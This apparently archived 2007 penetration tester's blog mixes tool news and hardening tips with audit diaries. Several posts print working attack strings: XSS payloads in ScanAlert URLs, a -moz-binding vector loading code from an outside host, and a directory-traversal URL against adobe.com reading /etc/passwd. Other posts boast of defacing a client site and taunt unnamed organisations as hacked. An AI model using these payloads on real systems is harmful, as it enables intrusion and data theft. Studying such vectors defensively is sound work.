Recently, i had been doing a lot of web penetration test and i realised that most of them suffers from injection flaws. Well, some can be deadly and some were just pretty minor. Well, it doesnt matter whether how severe the injection point is, if your site can be injected, it means that there are still some sanatizing and input validation work which still need to be followed up. Whenever i perform a penetration test on huge organization, scanners are always deemed useless and i have to do it manually with some form of checks i have on a list. Well, i managed to download a list of injection vectors from my friend Andres and that certainly helped me save time on googling for attack vectors. For those who do web penetration test, this will be very useful which will save your hours and hours looking, reading or searching around for information.

****************Start of the injection list*********************************

*****************************END*****************************************************

The Hacka Man

An Important Lesson, Passive Enumeration with Paterva

2007-10-28T01:16:00.000+08:00

I am about to assigned to a very exciting project and one of the most important elements of hacking is passive enumeration. I mean to bring down an organization or their networks, passive enumeration is definitely a must! This weekend i was scouring around for effective tools that would allow me to perform my search much faster and in a more logical and graphical manner and i happen to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. You can basically search for a person, DNSName, Website, Email, etc and it will return you with results of what a person had visited, the sites he visted, the words he used, etc. Of course instead of searching for a person, you can also perform searches for organization. I know people are going to say that this can also be done in google dorking. Well, thats absolutely true, google dorking is so much powerful with more explosive results. However, not everyone is an expert in that area and i mean this is only the surface of passive enumeration. To excel deeper, you would of course require certain skills like google dorking to do so. I am pretty much happy with Paterva because of its simplicity and the ability to produce results in a more systematic manner. Try it for yourself.

http://maltego1.paterva.com/maltego-classic.html

http://www.paterva.com/web/Maltego

The Hacka Man

Citrix Hacking

2007-10-26T12:14:00.001+08:00

Few weeks ago, pdp released an article about citrix hacking and it actually caught my attention. I read through a total of 4 pdp's posts and also wirepair's whitepaper on hackingcitrix. It was overall a basic yet interesting article and actually gave me an idea on how to start enumeration and hacking citrix. Well, for my next trick when i am about to audit citrix soon, i will start employing the techniques that was discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust is the citrix application and how can it handle certain payloads. Since Citrix is not taking security seriously according to wirepair's article, i would not hestitate to publish any flaws i find. With that being said, of course i would give them a chance to see how is their response.

The Hacka Man

Checkpwd 2.00 A12 released

2007-10-25T12:01:00.000+08:00

Alexander Kornbrust of red database security just released the much anticipated checkpwd oracle cracking tool. This release has much improvement over the previous releases. Some of those include:

* support for Oracle 11g passwords
* support for APEX passwords (1.4-3.0.1)
* collect passwords from the database
* collect password candidates from the database
* option not to display the oracle password in command line
* crack passwords from the password history
* crack role passwords
* save checkpwd default configuration in a configuration file
* read username and password hashes from a file

Well, personally i had tried the version 1.21 months ago and it wasn't bad after all. And now comes version 2? You bet, it will be so much interesting to test out the new features and see how the tool produce the results. Weeks ago, THC, a german underground hacking community released oracle 11g password cracker and i must admit that i haven't tried it yet, but now Alex had incorporated checkpwd 2.00 with oracle database 11g password cracking abilities.

For those who don't know, Alex is a world renowned oracle security expert. He is constantly reporting oracle bugs to Oracle and had published a lot of whitepapers and giving talks at conferences regarding oracle security. I had met him once in Dubai and i must say he is a humble and patient person with amazing oracle security knowledge. To find out more, check him out at the following links

http://www.red-database-security.com

http://blog.red-database-security.com

The Hacka Man

Results from Hacking a huge organization

2007-10-21T21:26:00.000+08:00

The other night i was auditing one of the customers here in Singapore. It was a huge organization with massive workforce and manpower. Normally huge organization tend to give people an impression that they must be secure because either they have enough internal people to do the patching or they must be doing some kind of upgrading work every now and then to have their servers or networks compliance with the government authority.

The results from my audit depicted that life isn't a bed of roses. Multiple servers suffers from DoS, buffer overflows and one of them even allows me to escalate to admin priveleges. Well, the results were really astonishing from such a reputable organization and everything was under my control. Of course, i managed to capture all screenshots of what i did and wrote a report to the management. I am wondering what they will do about it. They could either pray hard that no one attack them and start patching or expect for the worst where they could be brought down anytime anyday.

One of the coolest thing i did during the audit was defacement of their website. Personally, i had never deface a website before till that day. It was great seeing big organization websites having your own selected message or picture, definitely tarnishing their reputation and the feeling was just too estatic. Of course, i had to wrap it up fast by taking a screenshot of it and resume their site back to normal or i will be screwed. The one last thing i observed and found out was they were using a very old Operating System where most of their crucial data was residing. It was exhilarating as i was poking my way to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and i send it to the customer. I just want to see what is the response going to be.

The Hacka Man

Short update on audit

2007-10-20T00:07:00.000+08:00

For those of you guys who are waiting for the result of the audit, because of the things i found and the sheer volume of report writing i am doing, i will only update the findings next week when i finish the report. Sorry for the wait, but thanks for the understanding.

The Hacka Man

e... singapore, re-evaluate your website!

2007-10-18T22:37:00.000+08:00

Well, i am roughly around 10 mins before i start audit, but anyway, i would love to talk about e... singapore. Heard quite a few bad things about e... singapore and i remembered while i was at Dubai, i was asking them for a job, but in the end, they void my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... I have no grudges against e..., but frankly speaking, as a MSS and now trying to expand their business into the IS field, i am issuing a challenge against them. By just browsing their websites, i am pretty sure that they can be Own3d! From my guess, they could be easily using IIS 5 or 6 and for this i can be sure by just testing one of their functions, without scanning their website. As for owning them, i pretty sure they tightened up most of the holes, EXCEPT for one. All in all, if they want to step into the the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when they own site is at risk????? e..., get your internal auditors to re-evaluate the e... website or get me at NO cost to help you do the job.

The Hacka Man

ScanAlert, Hacker Safe?

2007-10-18T19:05:00.000+08:00

Yesterday, i heard from my colleagues that we would be joining forces with ScanAlert and i was really puzzled with the move. I was asking myself that if ScanAlert is really Hacker Safe? Are they really that good with their scanners? Did they use open source scanners and customized it to their own? Are those clients they have really safe from hackers? Can i say that if i use ScanAlert service to scan my website or network, i will be safe from hackers? There are a lot of questions in my head and i think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site which provide more visibility of ScanAlert's Service. Well, it is a good from a company point of view because they are recognized and make money out of it, however, that doesnt mean that by using their service, i will be free from attackers. Not long ago, i remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can i say that if i can find XSS on their site, their scanners are shitty and they are still hackers safe? I don't know, just my 2 cents worth. Anyway, i managed to digg out the XSS vector that was injected at their site sometime ago, however, they already patched it.

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

The Hacka Man

XSS-Proxy PoC

2007-10-12T10:34:00.000+08:00

The other day, i was thinking about how can i actually get more sales during a meeting session with customers and with the current bloom of hacking websites, i thought its time to actually show customers of what i can do and the impact of a XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and i decided to go with a tool called the XSS-Proxy. All i can say is this tool is really light and easy to use. All you need is just perl and a webserver to be running on your machine and one would have to just launch the listener from there on with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spend some time with me explaining to me how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. If those of you guys who would love to try this tool, download it at http://xss-proxy.sourceforge.net. There is also Advanced XSS attacks and a mini whitepaper for further knowledge reading.

First to startup xss-proxy:

Then inject a script tag into the victim page, be it persistent or reflected, try it to realised it.

The admin page contains the links that the victim had visited, and by clicking those links, you can choose to redirect and hijack the victim browser under the same document domain

A sample of the redirect attack. Observe the below grey bar with "Opening page.."
This is achieved through by clicking on the admin page on one of the links the victim had visited and i wanted the victim to visit another page, so i choose the link i wanted the victim to visit and click on it. On the victim side, he will automatically be redirected to the page i chosed.

And finally, i can even proxy javascript injection on the victim browser. A simple one would be alert('XSS');

The Hacka Man

AppCodeScan beta Released

2007-10-10T02:16:00.000+08:00

Few minutes ago, Shreeraj just updated me with the release of a new tool from Blueinfy. This tool basically check your source code for potential entry points for xss, sql injection, poor validation etc. Well, personally i had not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try and its free anyway. The tool is called AppCodeScan and for those who had already tried the tool, feel free to let me know as trust me, i am really eager to try on this. Also, check out Fortify's source code scanning tool which has similar functions and usage. The only difference is maybe the support and its an enterprise tool. At the same time, do check out their cost and you know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how to. Thank you Shreeraj.

http://blueinfy.com/tools.html

The Hacka Man

Try this at your own risk, COKE Machine hacked!!

2007-10-08T17:47:00.001+08:00

I was checking PDP's hack on citrix and i stumble across a coke machine hack. Well, i am not sure if this is an old exploit or if it is still working as of today or it is patched. However, i could not replicate this hack on a vending machine here. Maybe it is of a different model or different system or different chipset. Whatever it is, this is a cool one. Simple yet effective.

The Hacka Man

Just another XSS

2007-10-07T20:23:00.000+08:00

Well, i am getting tired of your site "big organization". PoC shown with screenshots of your site being XSS numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. What ever you decide, wish you good luck and all the best.

The Hacka Man

Preventation is better than Cure

2007-10-06T08:22:00.000+08:00

With over 6 years of experience in penetration tests of all sorts of systems from networks to web applications to databases to many others more, I can say that i have successfully achieve my goals as "hacker" or a white hat. As usual, i am constantly keeping myself abreast of the lastest exploits and hacking methodology. I am not really a true researcher, but however a guy who loves to read all sorts hacking books or articles.

Well, with the recent work i am doing on web applications, i can say that most web applications are truly not secure and hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea of how secure programming is so important. Once they are hacked, their reputation is gone and data is lost. From what i see, customers are always eager to launch their application online maybe because of certain time frame they have to meet or maybe because they are eager to let the consumers know more about their services and products, but they did not think about security on their applications as a whole. Well, i would advise them to think twice and think about the possibility of being hacked hard time. Below are a few guidelines that i got from Jeremiah's whitepaper that after reading it, i feel that it is important to embrace it, rather than treating it just like another whitepaper.

Secure Code: Application developers must consider security
from the beginning. Involve the security staff early in the
process.

QA Development: Experienced staff must perform periodic
security as well as usability reviews.

Stay up-to-date on patches and configured securely.

Continuous assessments: Covering both technical and logical
issues on the production web site as its being changed.

Also, for those who are paranoid about your web applications and have no budgets to spent, you guys should install an Web Application Firewall like ModSecurity to shield off most of the attacks and moreover, it is customizable where you can add your own ruleset. There are also a few open source WAF like PHP-IDS for XSS, URLSCAN for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what do you really need.

The Hacka Man

Another hole????

2007-10-05T20:27:00.000+08:00

Hey "big organization", need no explaination. You have been owned again. Well i am smart not to let you see the actual url string, else you will secure yourself? Still call me a script kiddie?? Think harder. Challenge me?? Why not do something to your site rather than challenging people here and there? Need to know the actual payload and url string? Call me. You are lucky i didn't use xss to portscan your internal network or cause a defacement and make you look like a fool. Respect others and respect yourself.

The Hacka Man

You are OwNED!!!

2007-10-04T15:41:00.001+08:00

Hey "big organization", I don't think i need to prove too much. Check out your logs or something. Check out whatever you have. I just spend roughly around 5 minutes on your site and i got what i want. Well, i don't think you worth my precious time doing good for your site. This is just a simple test. I can do more damaging stuff, but well I don't see the point of doing more damage. I don't have to prove no more. Take this shit from me and do your part. Peace.

The Hacka Man

Challenge me on Web Application Security???

2007-10-03T19:18:00.000+08:00

One day after the application penetration test, i was contacted by an huge organization who apparently view/read my blog. Basically they issue a challenge to test on my knowledge and skills on web application security assessment. Well, i don't really care or bother how huge you organization is, i accept your challenge and i will show you that your public facing website will be used as a zombie for unidentified attacks. Don't blame me for that. You issue a challenge and i responded. I don't have anything to prove, except that i would love to see how good is your web security.

The Hacka Man

Sessionn ID Manipulation?????

2007-10-02T22:16:00.000+08:00

So today is the last day for Phase 1 for my application penetest. Well, its always funny because its always during the last day that i will find something. In my previous posts, i was saying that the application is very secure. However, i found some session IDs manipulation that allows an attacker to impersonate someone. Well although its not high risk, but think of this situation. Lets say you and your friend is at a school compound or somewhere with network access and suddenly your friend is checking his account. With the mindset of a hacker, you know that by manipulating the session ID will allow you to gain access to his account, while he says that he wants to go to the toilet and forgets to logout, you quickly grab his session id and then change his password. From there on, you can monitor his account's transaction and status and moreover you can transfer money to your own account. I mean there is too many possibility. This is just one of the scenarios. You can let your imagination run wild and can come up with more evil stuff. However i just want to point out that since that application is already so secure, why not take another step to tighten this hole? Agree?????

The Hacka Man

Owning Axis IP Cameras

2007-10-01T15:57:00.000+08:00

Over the weekend, i had the time to review a whitepaper written by both Adrian Pastor and Amir Azam. In that article, they displayed certain XSS techniques that allowed an attacker to own the IP cameras and monitor it. Well, i would say that this is not too bad of an article as the PoC included. It is still the same old XSS that is doing the trick and CSRF that allows creation of admin accounts. The firmware for Axis is just crap. They should brush up on their security to avoid more security issues. For those who are interested, do check it out at

http://www.gnucitizen.org/blog/owning-big-brother-hollywood-style-exploits-included

The Hacka Man

2 Factor Authentication Last Update

2007-10-01T13:18:00.001+08:00

I think i am more or less done with my scope of work. There is simply no chance in hell that i can break that application. It like no matter what i entered, i always get a service not available or please try again later. Verified all the injection points and the stuffs that i can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escape all output characters. Lastly, every error message that is output is all generic error message with no other information. The only one last thing i am trying now is XSS on a 404 error page and see how it reacts. Still, this is what i got

And the generated source i got after the XSS:

[404 Not Found
Not Found
The requested URL /x/--><script>alert("XSS")</script><!--&node=465600 was not found on this server.]

The Hacka Man

Have you download your scancode?

2007-09-30T22:31:00.000+08:00

I was reading on Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he teaches the audience from dependency determination to mitigation and countermeasures of a web application. On top of it, he included a tool where he coded himself called "scancode" which is used to scan source codes for potential entry point for XSS and SQLi. This is a must read for those who wants to know more about source code reviewing process and methoddology. Download scancode at page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days, i am so involved with application security and neglected on the networking area. Well, i am trying to shift myself slowly away from the technical side of things and wish to involve more in business and development stuff. However, still i will keep myself abreast of the latest stuff that is going around in the security world.

The Hacka Man

Adobe Directory Traversal???????

2007-09-30T12:23:00.001+08:00

The other night Christ1an showed me a link of Adobe.com with directory traversal. It was an old exploit, however it works on Adobe. This showed how Adobe is not taking application security seriously. Well, i managed to saw the entire /etc/passwd file and DAMN!! i did not take a screen shot of it. I was too careless and excited not to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well check out the exploit here that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string i used few nights ago.

The Hacka Man

HashMaster v0.2

2007-09-30T11:46:00.000+08:00

Damn, Rsnake just released a small yet useful program known as the hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing, however i am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hashing string into the form, and the program will fetch the hashing algorithm used. This is rather useful. Because once you know the hashing algorithm, you can then use cracking software to crack for the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man

Can Your Machine Be Hacked?

2007-09-28T19:52:00.000+08:00

Last night, i received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provide users with ideas of how to secure holes in your PC. There are 12 tests and all of which gave an rough idea of how to secure your machine. Well, i would say it is a good start for those who wants to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Blueinfy.com

2007-09-27T22:46:00.000+08:00

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com, it is definitely a site worth visiting. With great in depth articles to simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj.Shah, an ex employee of Foundstone USA. Google him and you will know how powerful is he:)

The Hacka Man

XSS on a vendors website

2007-09-27T16:31:00.000+08:00

I am still testing on the application for flaws. However, it is so secure that i can't do a single thing. In the end, i end up testing a vendors site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when i view the source code. I was dejected as i knew there is something more i can do. A few minutes later, .mario was online and i told him about my problem. Immediatedly, he came up with a trick that allows XSS to happen. So in the end, i entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into the one of the form fields and when i view the source code, it was totally injected! This was what it displayed on the source code

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man

2 Factor Authentication Update

2007-09-25T16:08:00.000+08:00

I don't believe this, i can't basically do a SQL injection, CSRF or XSS! Everything i wanted to do is basically either encrypted or if i injection a simple character like ", it says service unavailable. This application can be considered very secure it terms of encryption and of good standard if weighing it against the OWASP top ten. Even if i enter a value like 10, this value will be encrypted with this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running outta ideas, tell me what more can i do??

The Hacka Man

2 Factor Authentication Day 2

2007-09-25T09:55:00.000+08:00

Damn, its getting tough! Have you guys seen a 6 digit password with an encrypted
string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, there is nothing more i can do? I dunno, still thinking:?????

The Hacka Man

2 Factor Authentication?

2007-09-24T20:17:00.000+08:00

Well, if you guys asked me if why i havent been updating my blog? I can only say that there is so much to be done in work and of course reading a lot on Rsnake's XSS exploit and defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well back to the main topic, i had been assigned to hack an application with 2 factor authentication. Damn, all i can say is it is very secure it terms of randomness in session id, hidden fields and encryption. There is no way i can break the application's login page and the only thing i found is only a jar file with lotsa class files inside. Well, i know i can use a java decompiler like jad to get the source code but i did not because i am concentrating more on finding vulnerabilities. Hmz....I will continue with part 2 tomorrow. Firefox is a very cool tool to do web hacking. Install the following extentions guys

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Sam, Wireless Hacking, Updates

2007-09-03T15:33:00.000+08:00

Its been a long time since i last updated my blog. I had been so busy these days with my current job. From planning to hacking. Also, i had been reading on Rsnake's and Jeremiah's book on XSS Exploit and Defence. It is a good book with great examples, however, there are some parts that i don't quite understand and i am still trying to catch up. Well, Sam, if you are reading this, check out this url below for your wireless audit.

http://www.leetupload.com/tutorials/hackingspoonfed/part1

The Hacka Man

PHP Application Firewall?

2007-08-11T12:04:00.000+08:00

I was discussing with Christ1an recently about application firewall and he actually presented me an application firewall written by pdp and maintained by .mario , which to me is very impressive. I actually looked at the source code and i must say that i don't understand a single shit. However, it was a nice effort from Christ1an and guys devoting their time to develop a php application firewall. I am network guy, i do web audit, but i am not good in coding or programming or source code review. Well, i am still learning, i want Christ1an on my team as i think he will be a very good addition to the company. Hey Christ1an, if you read this, please holla at me alright? I want to chat with you about career opportunities, you know how to reach me. Also, for guys who wants a SQLI cheat sheet, check this out:

http://ha.ckers.org/sqlinjection

http://ferruh.mavituna.com/makale/sql-injection-cheatsheet

Check out the PHPIDS Team's IDS and their XSS database

http://php-ids.org

http://www.gnucitizen.org/xssdb/application.htm

The Hacka Man

Cisco IOS 12.3T onwards with Tool Command Language

2007-08-09T12:10:00.000+08:00

I was again reading ioshints blog for cisco tricks. I must say he is the master of Cisco products and configuration. I was reading about tclsh and i must say it is very handy as i can write scripts and store it remotely, NVRAM or in the flash. Well, below are a few links that you can learn the basics of tclsh scripting.

http://ioshints.blogspot.com/2007/05/ios-tclsh-resources.html

http://ioshints.blogspot.com/2007/08/example-tcl-script-with-command-line.html

The Hacka Man

Exploiting FTP clients using PASV command

2007-08-07T21:27:00.000+08:00

Finally, i am back home to Singapore again. I am so happy and my mood starts to brighten again. I was researching about web security and i came across Wade Alcorn's website. He found out that it was possible to launch a reverse shell and own a Asterisk server using inter-protocol Exploitation. Also, check out BeEF, which is equivalent to Metasploit type of framework for web applications. Lastly, do check out the FTP PASV command manipulation which allows FTP servers to cause vulnerable FTP clients to connect to other hosts.

"The paper discusses how the FTP client flaw in detail and demonstrates how it can be used to attack common web browsers such as Konqueror, Opera and Firefox. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions)."

http://www.bindshell.net/papers/ftppasv

The Hacka Man

Michael Lynn Cisco IOS reverse shell exposed?

2007-08-05T18:13:00.000+08:00

I was reading articles and looking at how Michael Lynn's exploit works in the 2005 blackhat. Nothing can be found as the code was not leaked out nor anyone knows much actual exploit. I was determined and i found something that relates to heap overflow in Cisco IOS. I think its something similiar to Michael Lynn's exploit using the IOS check_heaps() function. For more, check it out here: http://www.irmplc.com/content/pdfs/Cisco_IOS_Exploitation_Techniques.pdf
The Hacka Man

Attribute-Based XSS and Verifying if your webmail account is Hacked!

2007-08-05T12:48:00.000+08:00

These days, i am just plain lazy. Maybe it is due to the mood that i am going back to Singapore or maybe i am just depressed with certain issues here. But whatever it is, i am still doing a lot of researching and penetration testing work. Its been a long time since i last visited Jeremiah's blog. Today, i just went through his blog and discover two interesting topic that catch my eye. One is a new XSS vector known as Attribut-Based Cross-Site Scripting and How to check if your WebMail account has been hacked (Redux). Check it out at http://jeremiahgrossman.blogspot.com. He described a way of how to find out a hacker had hacked into your webmail, how the new XSS vector worked and how to prevent it. It is ab absolutely must read for all webappsec ppl.

The Hacka Man

Basic Cisco Switches Auditing Guidelines

2007-07-27T15:13:00.000+08:00

1. Always use VLAN to create collision domain to limit broadcast traffic. Remember that VLAN1 is the admin VLAN which is used for administrative purposes and avoid using VLAN1 to prevent hackers from plugging into unused ports to communicate with the rest of the network.

2. Avoid using autotrunking mode. Dynamic Trunking Protocol allows VLAN-Hopping attacks where hackers are able to communicate in various VLANs. Assign trunk interface to the native VLAN other than VLAN 1

3. Make sure Spanning Tree Protocol is mitigated from attacks. Enable portfast, bpdufiler, bpduguard, and root guard on the switches.

4. Disable all unused ports on the switch to prevent hackers from plugging into unused ports to communicate with the rest of the network.

5. Turn off VLAN Trunking Protocol if not in used. If required, VTP should be used with passwords enabled.

6. Review the network or configuration to limit thresholds for multicast and broadcast traffic on switch ports.

The Hacka Man

Remote Command Exec (FireFox 2.0.0.5)

2007-07-25T14:09:00.000+08:00

These days, i am reading about web applications hacking and trying out several different stuffs. I happen to stumble across xs-sniper's page and read about his post on owning most major browsers. It appears that there is a problem with Cross Application Browser Scripting where a flaw in the URI handling behavior allows for remote command execution. Be sure to check out his post below:

http://xs-sniper.com/blog/remote-command-exec-firefox-2005/

The Hacka Man

Thanks Chr1stian, Google Store flaw?

2007-07-19T16:28:00.000+08:00

The other night i was talking to Chr1stian about XSS and google. We were chatting and suddenly the topic got more and more interesting. But anyway, Chr1stian is really a kind soul and a nice nice person to talk with. He taught me a lot of things which i don't understand and guide me slowy with each steps. Thank you Chr1stian for your patience, I can say that now i understand at least 90% of what you taught me. Also, we were talking about how security doesn't make money to flaws in google to google did not correct most of them holes that were reported by him.

I am sure that if i got a chance to test the google application, i will find more flaws, however because of my work schedule, i don't really have the time to play around. Anyway, i still wanna say thanks to Chr1stian, don't forget our deal. :)

The Hacka Man

The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws

2007-07-17T10:47:00.000+08:00

Sorry for the lack of updates. Recently, i had been reading a lot of books about web hacking and RFID and neglected blogging. Its due to work nature that i have to report what i do everyday. However, just yesterday, I had a small chat with the author of the famous burp proxy and realised that he published a book call "The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws". According to him, this was what he said "Our book aims to be the most comprehensive and deep guide to hacking web applications available. It covers numerous advanced topics like blind SQL/other injection, obscure logic flaws, attacking multi-stage authentication, new attacks against webusers, ViewState tampering, decompilation of thick client components, source code review, use of bespoke automation, and many more." As usual, i would always buy books to read and this one is not to be missed. If someone can guarantee me that his book is good, with experience in developing tools and giving talks in blackhat, then i will spend that kind of money in buying his books. Well, let me know what you guys think?

The Hacka Man

IPSec VPN in PIX/ASA

2007-07-04T14:04:00.000+08:00

For those of you who wants to setup an IPSec VPN connection in the PIX/ASA firewall, below is a snaphot of the commands of how to do it.

crypto ipsec transform-set hacker esp-aes-256 esp-sha-hmac
crypto dynamic-map dynmap 20 set transform-set hacker
crypto map hacker 10 ipsec-isakmp
crypto map hacker 10 match address IPSEC_hackers
crypto map hacker 10 set peer 111.111.111.111
crypto map hacker 10 set transform-set hackerZ
crypto map hacker 20 ipsec-isakmp dynamic dynmap
crypto map hacker client authentication LOCAL
crypto map hacker interface outside
isakmp enable outside
isakmp key ******** address 111.111.111.111 netmask 255.255.255.255 no-xauth no-config-mode
isakmp identity address
isakmp nat-traversal 20
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption aes-256
isakmp policy 10 hash sha
isakmp policy 10 group 1
isakmp policy 10 lifetime 86400
isakmp policy 20 authentication pre-share
isakmp policy 20 encryption 3des
isakmp policy 20 hash md5
isakmp policy 20 group 2
isakmp policy 20 lifetime 86400
vpngroup crm525gp address-pool vpnpool
vpngroup crm525gp idle-time 1800
vpngroup crm525gp max-time 86400
vpngroup crm525gp password ********
vpngroup helpgrp address-pool vpnpool2
vpngroup helpgrp idle-time 1800
vpngroup helpgrp max-time 86400
vpngroup helpgrp password ********

The Hacka Man

DNS Pinning Exposed

2007-07-04T00:22:00.000+08:00

Christ1an wrote a very detailed article on Anti anti anti DNS Pinning or you can call it DNS pinning. For those who are still confused or still find it complicated to understand, this article actually explained it with a step by step approach with pictures attached. In it he mentioned the whole dns pinning issues and how it actually works to attack a web browser. Check it out here: http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

The Hacka Man

VoIP article ready soon

2007-07-02T17:27:00.000+08:00

I am in the midst of writing my VoIP article for hakin9 magazine and frankly speaking i am very restless these days. Still, i force myself to quickly write this article, so it can be publish soon for those VoIP auditors to give a comment, or for anyone who is interested in auditing VoIP services. Well, this article is easy to understand and it is not going to be tough to learn the techniques described. For a beginner, you will find this a useful yet interesting article and for a expert, this is not for you. I plan to write a more in depth and advance article in future if i have the resources and time. I will keep you guys updated on the status once it is published.

The Hacka Man

Youtube's 40+ security vulnerabilities

2007-06-29T15:07:00.000+08:00

The other night i was chatting with Chris1an about web security and i just happen to realised that he was actually the one who killed Youtube. Some of you might have already knew that he was the one who discovered around 40+ vulnerabilities in Youtube and became famous overnight. Anyway Christ1an is based in Germany and he is only a student, but hack, he is a guru in web security. He was being interviewed by the register and google actually thanked him for his work.

Recently Christ1an launched http://planet-websecurity.org/ with the intention to bring together similarly themed news and rants related to Web security and to display them in one place. Visit his blog on the right side of my feed or check it out here.

The Hacka Man

SAP

2007-06-28T00:48:00.000+08:00

